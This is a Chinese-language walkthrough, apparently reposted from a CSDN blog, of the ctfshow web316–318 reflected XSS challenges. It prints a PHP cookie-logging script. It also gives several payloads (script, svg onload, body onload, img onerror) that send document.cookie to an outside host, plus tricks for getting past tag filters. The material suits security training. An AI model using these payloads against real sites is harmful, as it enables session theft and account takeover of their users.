欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 新闻 > 焦点 > ctfshow(316,317,318)--XSS漏洞--反射性XSS

ctfshow(316,317,318)--XSS漏洞--反射性XSS

2024/11/13 3:46:52 来源:https://blog.csdn.net/m0_56019217/article/details/143581799  浏览:    关键词:ctfshow(316,317,318)--XSS漏洞--反射性XSS

反射型XSS相关知识

Web316

进入界面:
在这里插入图片描述

审计

显示是关于反射性XSS的题目。

思路

首先想到利用XSS平台解题,看其他师傅的wp提示flag是在cookie中。
当前页面的cookie是flag=you%20are%20not%20admin%20no%20flag。
但是这里我使用XSS平台,显示的cookie还是这样,并不能得到flag。该方法先作罢。

于是我们使用稳定性更高的方法:写js代码将cookie传到自己的服务器上。
先在服务器写一个php文件:

//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

然后在靶机中传入如下代码:

<script>location.href="http://[自己服务器的IP]/flag.php?cookie="+document.cookie</script>

提交之后成功跳转到自己的网页。
查看自己服务器中的cookie.txt文件,得到flag。

Web317

界面与上一题相同。
但是过滤了<script>,大小写混写也不能使用。
考虑使用HTML的其他标签。

这道题我们使用<svg>与onload属性

<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>//svg 是用于绘图的标签
//onload事件 是页面加载成功后执行的事件

得到flag.

其他形式的payload:

//body标签也支持onload事件
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>//img标签支持onerror属性。当图片加载发生了错误,就会触发该事件
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

Web318

和上一题相同,不过多过滤了img标签。
使用body或者svg标签即可。

<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/><svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

得到flag.

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com